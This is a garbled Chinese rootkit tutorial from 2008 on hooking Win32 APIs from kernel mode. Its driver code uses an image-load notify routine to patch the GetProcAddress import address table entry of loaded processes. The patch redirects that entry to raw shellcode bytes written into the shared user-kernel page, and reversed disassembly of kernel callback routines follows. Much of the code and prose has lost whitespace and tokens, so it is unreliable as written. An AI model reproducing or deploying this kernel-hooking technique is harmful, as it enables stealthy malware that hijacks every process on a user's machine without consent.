安全进阶1内核hook7iat今天这篇主要是讲在中HOOKWIN32API办

标题:【】rootkithook之[七]IAT作者:时间:2008-03-链接: HOOK,HOOKWIN32APIDLLHOOKAPIhook7在内核中hookwin32api需要用scode的东西。因此在内核中hookwin32api也具有。因这里有个问题要解决，就是你的hook函数是在ring0中实现的，ring3如何能到呢？俗话说，天无绝人，总会有解决办法的。就是BarnabyJack在 “RemoteWindowsKernelExploitation:StepintotheRing0”中所用的技术。它利用了两个虚地址映射到同一个物理地址这个事实。内核地址0xFFDF0000和用户地址0x7FFE0000都指向同一物理页面。内核地址是可写的，但用户地址则不能。lkd>dt+0x000 :+0x004TickCountMultiplier:+0x008 :+0x014 :+0x020 :+0x02c :+0x02e :+0x030 :[260]+0x238MaxStackTraceDepth:+0x23c :+0x240 :+0x244 :[8]+0x264 :+0x268ProductTypeIsValid:+0x26c :+0x270 :+0x274ProcessorFeatures:[64]+0x2b4 :+0x2b8 :+0x2bc :+0x2c0AlternativeArchitecture:+0x2c8SystemExpirationDate:+0x2d0 :+0x2d4KdDebuggerEnabled:+0x2d5NXSupport:+0x2d8 :+0x2dc :+0x2e0 :+0x2e4LastSystemRITEventTickCount:+0x2e8NumberOfPhysicalPages:+0x2ec :+0x2f0 :+0x2f8TestRetInstruction:+0x300 :+0x304SystemCallReturn:+0x308 :[3]+0x320 :+0x320 :+0x330 :Uint4B4K0x1000,0x334我们当然可以利用了。demo8002047hookring0ring3IAThookhookapi,例hookGetProcAddress。我们把要执行的函数写入共享区中.IATHOOK写入的函数的地址。当用户程序调用GetProcAddressapi函数的时候，共享区中的这段scode码便被执行了。我们demo是指要调用GetProcAddress的地方都会弹出一个框。简单写一个scode如下#includeintmain(intargc,char*{HMODULEhM={

pushcallpopsubebp,offsetjmp _emit_emit_emit_emit

//GetProcAddressIAT_emit_emit_emit_emit0x7cpush0xcall_emit_emit_emit_emit_emit_emit_emit_emit

call_emit_emit_emit_emit_emit_emit_emit_emit_emit_emit_emit_emit

pushleaeax,[ebp+fun1]call[eax]leaeax,[ebp+fun2]popebpjmpDWORD}return}0x10,0x40,0x00,0xE9,0x08,0x10,0x40,0x00,0xE9,0x08,0x00,0x02,

0x55,0xE8,0x00,0x00,0x00,呵呵，自从挂接了这个驱动，我的机器里面，随便启动个程序，就不停的弹出窗口了。下面贴出代码NTSTATUSDriverEntry(INPDRIVER_OBJECTINPUNICODE_STRING{NTSTATUSgb_Hooked=FALSE;//WehavenothookedyetntStatus=PsSetLoadImageNotifyRoutine(MyImageLoadNotify);return}VOIDMyImageLoadNotify(IN IN Proce,//Processimageis{UNICODE_STRING

IN DbgPrint("Imagename:%ws\n",FullImageName-//SetupthenameoftheDLLtotargetRtlInitUnicodeString(&u_targetDLL,L"\\WINDOWS\\system32\\user32if pareUnicodeString(FullImageName,{DbgPrint("imageInfo- ProceeHookIAT(&u_targetDLL,"GetProcAddress",Proce}}NTSTATUSHookIAT(PUNICODE_STRINGpModuleName,PCHARpFunctionName, {ULONGPLIST_ENTRYpCurrentList=NULL,pTempList=NULL,pLoadOrderModuleList,list;PPEBpPeb=NULL;ULONGhModule,temp;pPeb=(PPEB)(*(PULONG)(pEProcess+PEBOFFSET));if(pPeb!={ //pLoadOrderModuleList=pPeb->LoaderData->InLoadOrderModuleList.Flink;list=pLoadOrderModuleList; //EXE{UNICODE_STRINGpstrTemp=((PLDR_MODULE)list)->FullDllName;DbgPrint("modulename=%ws\n\n\n\n",pstrTemp.Buffer);if(wcsstr(pstrTemp.Buffer,L".exe")!={hModule=(ULONG)((PLDR_MODULE)list)-temp=DbgPrint("FindModulebaseAaddress=

}

HookImportsOfImage((PIMAGE_DOS_HEADER)hModule,Procelist=list-}while(list!=pLoadOrderModuleList);}return}NTSTATUSHookImportsOfImage(PIMAGE_DOS_HEADERimage_addr,HANDLEh_proc,PCHAR){PIMAGE_DOS_HEADERdosHeader;PIMAGE_NT_HEADERSPIMAGE_IMPORT_DESCRIPTORimportDesc;PIMAGE_IMPORT_BY_NAMEp_ibn;DWORDimportsStartRVA;PDWORDpd_IAT,pd_INTO;intcount,char*dll_name=char*pc_dlltar="kernel32.dll"; PDWORDDWORDd_sharedM=0x7ffe0800;DWORDd_sharedK=unsignedcharnew_code[]=

0x55,0xE8,0x00,0x00,0x10,0x40,0x00,0xE9,0x08,0x00,0x00,0x00,0x02,6A,8d,

0x8d,0x85,0x51,0x10,0x40,0x00,0xFF,0x10,0x55,0x10,0x40,0x00,0x5d,0xFF,dosHeader=(PIMAGE_DOS_HEADER)pNTHeader=MakePtr(PIMAGE_NT_HEADERS,dosHeader->e_lfanew//First,verifythatthee_lfanewfieldgaveusa//pointer,thenverifythePEif(pNTHeader->Signature!=IMAGE_NT_SIGNATURE)returnSTATUS_INVALID_IMAGE_FORMAT;importsStartRVA=pNTHeader-ifreturnimportDesc=(PIMAGE_IMPORT_DESCRIPTOR)(importsStartRVA+(DWORD)dosHeader);for(count=0;importDesc[count].Characteristics!=0;count++){dll_name=(char*)(importDesc[count].Name+(DWORD)dosHeader);DbgPrint("ImportsfromDLL:%s",dll_name);

pd_IAT=(PDWORD)(((DWORD)dosHeader)+(DWORD)importDesc[count].FirstThunk);pd_INTO=(PDWORD)(((DWORD)dosHeader)+(DWORD)importDesc[count].OriginalFirstfor(index=0;pd_IAT[index]!=0;{DbgPrint("ImportsfromDLL:%s",dll_name);DbgPrint("Address:%x\n\n\n\n", //Ifthisisanimportbyordinalthe//bitisif((pd_INTO[index]&IMAGE_ORDINAL_FLAG)!={p_ibn=(PIMAGE_IMPORT_BY_NAME)(pd_INTO[index]+((DWORD)dosHeader));if((_stricmp(dll_name,pc_dlltar)==0)&&\(strcmp(p_ibn->Name,pc_fnctar)=={DbgPrint("ImportsfromDLL:%s",DbgPrint("Name:%sAddress:%x\n",p_ibn->Name,//Usethetrickyoualreadylearnedtomapa//virtualaddresstothesamephysicalpageso//permission//MapthememoryintooursowecanchangethepermissionsontheMDLp_mdl=MmCreateMdl(NULL,&pd_IAT[index],4);return//Changetheflagsofthep_mdl->MdlFlags=p_mdl->MdlFlags|MDL_MAPPED_TO_SYSTEM_VA;MappedImTable=MmMapLockedPages(p_mdl,KernelMode);if{//Writingtherawopcodesto//usedakerneladdressthatgets//intotheaddressspaceofall//thankstoBarnabyJack RtlCopyMemory((PVOID)d_sharedK,new_code,RtlCopyMemory((PVOID)(d_sharedK+22),(PVOID)&pd_IAT[index], gb_Hooked=}//Offsettothe"new*MappedImTable=//MmUnmapLockedPages(MappedImTable,p_mdl);}}}}return}lkd>ul805c609e805c60a0805c60a1805c60a3805c60a4805c60a5edidwordptr805c60ab nt!ExAllocateCallBack c)805c60b0 ebx,eaxnt!PsSetLoadImageNotifyRoutine+0x1fnt!PsSetLoadImageNotifyRoutine+0x49805c60bd 805c60bebee0a75580 esi,offsetnt!PspLoadImageNotifyRoutine(80550pareExchangeCallBack(806031ac)805c60ce751dc60ed)；nt!PsSetLoadImageNotifyRoutine+0x4f805c60d0805c60d3805c60d6805c60d9nt!PsSetLoadImageNotifyRoutine+0x25Privileges805c60e1 4805c60ed 805c60f2b9c8a75580 ecx,offsetnt!PspLoadImageNotifyRoutineCount(8805c60f7 dwordptrptr[nt!PsImageNotifyEnablednt!PsSetLoadImageNotifyRoutine+0x48逆向为cNTSTATUSIN ){ULONGPEX_CALLBACK_ROUTINE_BLOCKCallBack=ExAllocateCallBack(NotifyRoutine,NULL);if(CallBack==NULL)returnfor(i=0;i<0x20/4;{ ){

InterlockedIncrement(&PspLoadImageNotifyRoutineCountPsImageNotifyEnable=TRUE;returnSTATUS_SUCCESS;}}CallBackSePrivilegesreturn}lkd>uExAllocateCallBackl30cefh1ant!ExAllocatePoolWithTag fnt!ExAllocateCallBack+0x26ecx,dwordptrdwordptrdwordptrcecx,dwordptrfdwordptr8逆向为ctypedefstruct_EX_CALLBACK_ROUTINE_BLOCK{ PEX_CALLBACK_FUNCTIONFunction; }EX_CALLBACK_ROUTINE_BLOCK, ExAllocateCallBack(INPEX_CALLBACK_FUNCTIONFunction,INPVOID){ CallBack=ExAllocatePoolWithTag(1,0x0c,0x {CallBack->RundownProtect=0;CallBack->Function=Function;CallBack->Context=Context;}}lkd>uSePrivileges805e61ee 805e61f0 805e61f1